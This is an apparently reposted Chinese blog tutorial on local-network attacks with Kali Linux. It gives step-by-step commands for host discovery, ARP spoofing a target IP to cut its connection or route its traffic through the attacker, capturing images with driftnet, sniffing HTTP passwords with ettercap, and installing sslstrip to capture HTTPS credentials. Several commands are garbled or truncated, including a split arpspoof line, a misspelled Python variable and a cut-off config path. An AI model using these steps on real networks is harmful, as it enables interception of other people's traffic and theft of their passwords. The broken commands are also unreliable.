⼀篇⽂章带你了解kali局域⽹攻击⽬录
总结
前⾔
很久以前的博客才发现,发布⼀下。
这个系列以后有时间再做。
arp攻击
arp路由链表,感兴趣的⾃⾏百度,我的博客我的笔记.
路由指向
介绍两个东西.
echo 0 >/proc/sys/net/ipv4/ip_forward #让经过的数据不留通
echo 1 >/proc/sys/net/ipv4/ip_forward #让数据流通
内⽹扫描
这个在百度上你可以看到很多相关的⽅式,⽐如nmap fping
但是基本上扫描结果不太号,在虚拟机上你会发现你把主机的防⽕墙关了都扫不到主机.
这⾥使⽤netdiscover
当然这⾥也写⼏个nmap之类的指令
nmap -PR -sL ip
fping -asg ip
netdiscover -i kali⽹卡 -r ip(⽹段)
netdiscover -i eth0 -r 192.168.43.1/30
扫描速度是⽐较慢的
断⽹攻击
arpspoof -i kali的⽹卡 -t ⽬标地址⽬标⽹卡
arpspoof -i eth0 -t 192.168.43.7 192.168.43.1
arp欺骗信息获取
1.arpspoof -i eth0 -t 19
2.168.4
3.7 192.168.43.1开始欺骗让数据经过你的电脑
获取图⽚
使⽤⼯具difinet
difinet -i eth0(⽹卡)
实际操作:
图⽚会在那⾥临时保存
由于⽹络问题可能会有点卡
获取HTTP连接的密码信息
使⽤ettercap
其他的操作还是⼀样的,要开启arp欺骗ettercap -Tq -i eth0
kali vim命令-T ⽂本模式 q 安静模式 i ⽹卡
然后等待即可.不过现在都是https,作⽤不⼤
出现中⽂怎么办,直接赋值中⽂乱码,之后解码即可
百度搜索url解码
或者直接使⽤python
中⽂编码
from urllib.parse import quote,unquote
str1 = '中国'
str2=quote(strl)
print(str2)
解码
print(unquote(str2))
获取HTTPS的密码信息
这个要先修改以下ettercap的配置⽂件.
vim /etc/f
使⽤⼯具 sslstrip
那个吐槽⼀下 kali 2020是没有sslstrip的原因是没有安装python2的pip 只有pip3
记住⼀定要先安装python2
在kali⾥⾯python 默认为python2 当然你可以⽤ln -s 修改⼀下.
apt install python 这个时候会⾃动安装python 2.7
然后输⼊以下指令安装sslstrip
git clone github/moxie0/sslstrip.git
cd sslstrip
python setup.py install
这个是python2的,如果没猜错可能会遇到OpenSSL报错说没有这个模块pip install pyOpenSSL
总结
本篇⽂章就到这⾥了,希望能给你带来帮助,也希望您能够多多关注的更多内容!
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论